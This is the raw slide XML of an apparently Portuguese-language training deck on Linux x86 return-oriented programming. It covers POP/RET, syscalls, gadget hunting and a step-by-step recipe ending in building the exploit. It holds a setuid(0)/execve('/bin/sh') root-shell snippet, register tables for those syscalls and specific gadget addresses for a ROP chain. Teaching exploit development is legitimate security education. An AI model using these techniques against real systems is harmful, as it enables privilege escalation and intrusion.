            <a:endParaRPr lang="pt-BR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="626262"/>
              </a:solidFill>
              <a:latin typeface="Rubik Light"/>
              <a:cs typeface="Rubik Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr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626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik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https://github.com/helviojunior</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="626262"/>
              </a:solidFill>
              <a:latin typeface="Rubik Light"/>
              <a:cs typeface="Rubik Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="626262"/>
              </a:solidFill>
              <a:latin typeface="Rubik Light"/>
              <a:cs typeface="Rubik Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagem 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28208BAF-01C3-0446-90FE-48B3C905A22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5581" y="3833499"/>
            <a:ext cx="1758508" cy="225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DE825F-90B4-3F4F-904D-C0D39ED302C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5580" y="4058523"/>
            <a:ext cx="1758509" cy="225089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="eMAPT certification logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD186F9-7F03-D047-92CA-CDFB7CD7C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8809" y="4343290"/>
            <a:ext cx="595280" cy="4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CXD certification logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BE7D37-6DDE-D24C-8838-BEE511233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5580" y="4343290"/>
            <a:ext cx="597348" cy="44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E90E95-8D73-4643-B7CC-9E82DF5F855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6467" y="2075877"/>
            <a:ext cx="1757622" cy="175762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D6684-21E8-904D-A6E2-AB22B94A4A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7968"/>
            <a:ext cx="9144000" cy="41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9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Assembly - RET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b="0" dirty="0"/>
              <a:t>RET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Transfere o fluxo de execução da aplicação para o endereço localizado no topo da pilha. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Supondo que no topo da pilha contenha o endereço 0x01010101 o RET poderia ser comparado como igual a um JMP 0x01010101.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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342900"/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7055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Assembly - CALL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E7FBC-E123-9544-8B1B-654EFE28CE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74642"/>
            <a:ext cx="9144000" cy="416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32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Assembly - CALL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A6176-7EDD-F542-8FA2-7B29E1E82D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74642"/>
            <a:ext cx="9144000" cy="416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5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3ACCAD-26F4-2348-93A3-9FCCED5A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ROP – Return Oriented Programming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A15C36-DEBA-514A-97C2-385093D4F46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="49126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B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Fonte: http://trust.csu.edu.cn/conference/SpaCCS2016/BestPaper.pdf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A297F-9372-3B4F-9E9C-851C480B4E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6239" y="945931"/>
            <a:ext cx="4517376" cy="365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52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1ED2BF-529E-1244-9531-92CC4B66E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Código C - Spawn /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR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845E6A-90C9-9240-93E8-A6AE9798CC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55195"/>
            <a:ext cx="9144000" cy="27883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133A56-8B4B-F945-91DA-9B8284127626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="139406" y="710707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#include &lt;stdlib.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en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#include &lt;stdio.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en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#include &lt;string.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BR" dirty="0"/>
              <a:t>int main( int argc, char *argv[] ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BR" dirty="0"/>
              <a:t>    setuid(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BR" dirty="0"/>
              <a:t>    execve("/bin/sh", NULL, NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-B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93128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1ED2BF-529E-1244-9531-92CC4B66E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SetUID</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR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B196D-34A3-6340-A291-4B47ED8867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46082"/>
            <a:ext cx="9144000" cy="1508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6880D-16E8-6D49-AC26-5AC3CE4330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67239"/>
            <a:ext cx="9144000" cy="565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5A2D48-CF50-FA4A-997D-88AB9CE0A82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11410"/>
            <a:ext cx="9144000" cy="4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2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1ED2BF-529E-1244-9531-92CC4B66E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https://sec4us.com.br/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cheatsheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>shellcoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR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632841-DDAD-494A-A0D9-7009C57CBA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79" y="635625"/>
            <a:ext cx="8130441" cy="464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82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1ED2BF-529E-1244-9531-92CC4B66E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valores</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR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A30C229-5A9E-E141-AB43-21653CA8F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516998"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="164488" y="1085451"/>
          <a:ext cx="8815023" cy="1984918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1522126">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2429615074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3245005">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4050117361"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4047892">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2486591742"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="493840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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Registrador</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>Valor</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Descrição</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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7845361"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="987680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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>0x17 (decimal 23)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Número</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> do Syscall do </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>setuid</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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3521857"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="503398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ebx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>0x00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>1 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>parâmetro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = User id root = 0x00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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9969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435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1ED2BF-529E-1244-9531-92CC4B66E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Localizando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Gadgets</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR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2C0C55-B1F9-3F4B-B3A0-85EA8C08A5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5625"/>
            <a:ext cx="9144000" cy="2534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8AB408-66DF-1A43-B1D8-A1880627AC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1132"/>
            <a:ext cx="9144000" cy="336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06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675697" y="2661598"/>
            <a:ext cx="2109300" cy="8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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A1A99"/>
                </a:solidFill>
                <a:latin typeface="Rubik Medium"/>
                <a:ea typeface="Rubik Medium"/>
                <a:cs typeface="Rubik Medium"/>
                <a:sym typeface="Rubik Medium"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr sz="3700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3A1A9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3209024" y="2230163"/>
            <a:ext cx="5728444" cy="174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15000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262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Rubik Light"/>
              </a:rPr>
              <a:t>Entendendo as instruções POP e RET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262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Rubik Light"/>
              </a:rPr>
              <a:t>Linux Syscall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262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Rubik Light"/>
              </a:rPr>
              <a:t>Entendendo o ROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262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Rubik Light"/>
              </a:rPr>
              <a:t>Criando um ROP Chain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3070756" y="1800448"/>
            <a:ext cx="0" cy="2609400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="3A1A9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311EFE-1FD0-5E49-AB00-229E339E6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Atribuindo EAX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EF26C-678F-454A-ADE8-9284ED70CD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0x7274047d : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x72740526 : add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0x17 ; ret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576385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311EFE-1FD0-5E49-AB00-229E339E6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Atribuindo EBX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EF26C-678F-454A-ADE8-9284ED70CD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0x72740493 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215963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311EFE-1FD0-5E49-AB00-229E339E6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Chamando SYSCALL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EF26C-678F-454A-ADE8-9284ED70CD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0x72740508 # int 0x80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300658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ROP Chain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50F9EDC-2034-D84A-AC71-68EAE6B2498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3312"/>
            <a:ext cx="9144000" cy="45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45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ROP Chain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DCAC5-2551-6449-825A-52223B45B1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3312"/>
            <a:ext cx="9144000" cy="45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44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ROP Chain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2BC37F-8647-714A-8028-28CA52DA0B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3312"/>
            <a:ext cx="9144000" cy="45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52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ROP Chain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0351EB-CBB0-8341-A41E-1F62EEFAE28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3312"/>
            <a:ext cx="9144000" cy="45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83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ROP Chain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9A629-0DF8-1F49-8385-B7B26711DE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3312"/>
            <a:ext cx="9144000" cy="45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67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ROP Chain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1E18B-3D9E-A241-A2D7-FE98F012D75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0" y="617695"/>
            <a:ext cx="9144000" cy="45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99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ROP Chain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A5F46-10F1-DE40-A700-9F510B05B2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3312"/>
            <a:ext cx="9144000" cy="45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84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654677" y="3292845"/>
            <a:ext cx="2109300" cy="82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3A1A99"/>
                </a:solidFill>
                <a:latin typeface="Rubik Medium"/>
                <a:ea typeface="Rubik Medium"/>
                <a:cs typeface="Rubik Medium"/>
                <a:sym typeface="Rubik Medium"/>
              </a:rPr>
              <a:t>Receita de bolo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3A1A99"/>
                </a:solidFill>
                <a:latin typeface="Rubik Medium"/>
                <a:ea typeface="Rubik Medium"/>
                <a:cs typeface="Rubik Medium"/>
                <a:sym typeface="Rubik Medium"/>
              </a:rPr>
              <a:t>ROP - Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3A1A9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3209024" y="1923719"/>
            <a:ext cx="5728444" cy="2362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15000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t>Crie as chamadas das funções desejadas em C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t>Verifique a disponibilidade do uso do Syscall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t>Crie uma tabela de requisitos (de -&gt; para) dos valores dos registradores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t>Verifique os </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0" err="1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Rubik Light"/>
              </a:rPr>
              <a:t>Gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t> disponíveis para executar o código desejado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t>Crie o exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3070756" y="1800448"/>
            <a:ext cx="0" cy="2609400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="3A1A9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76A3C4A-E7DF-7A48-B30F-5859C65080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514" y="1923719"/>
            <a:ext cx="1871626" cy="136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67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5612AF-D924-AD43-9387-B74B55BAD1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3312"/>
            <a:ext cx="9144000" cy="4500188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ROP Chain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C2950B-297D-C541-B73D-CC1610156F4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="139407" y="908488"/>
          <a:ext cx="6071822" cy="1984918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1285355">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2429615074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1912297">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4050117361"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2874170">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2486591742"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="493840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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Registrador</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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</a:rPr>
                        <a:t>Valor</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Descrição</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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7845361"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="987680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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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</a:rPr>
                        <a:t>0x17 (decimal 23)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Número</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> do Syscall do </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>setuid</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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3521857"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="503398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ebx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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</a:rPr>
                        <a:t>0x00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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</a:rPr>
                        <a:t>1 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>parâmetro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = User id root = 0x00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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9969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904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1ED2BF-529E-1244-9531-92CC4B66E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Spawn /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR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75424C-6070-2C49-94DC-610FE3EFF8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52901"/>
            <a:ext cx="9144000" cy="20420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2148FE-1304-914C-B074-AB5BD924C0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18103"/>
            <a:ext cx="9144000" cy="55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39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1ED2BF-529E-1244-9531-92CC4B66E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valores</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR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A30C229-5A9E-E141-AB43-21653CA8FA9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="164488" y="1085451"/>
          <a:ext cx="8815023" cy="2972598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1522126">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2429615074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3245005">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4050117361"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4047892">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2486591742"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="493840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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Registrador</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>Valor</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Descrição</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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7845361"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="987680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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>0xb (decimal 11)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Número</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> do Syscall do </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>execve</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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3521857"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="503398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ebx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ponteiro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> para o </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>texto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> /bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sh</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>1 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>parâmetro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = pathname = /bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sh</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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9969905"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="493840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ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>0x00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>parâmetro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = NULL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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3993728"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="493840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edx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>0x00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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effectLst/>
                        </a:rPr>
                        <a:t>3 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>parâmetro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = NULL </a:t>
                      </a:r>
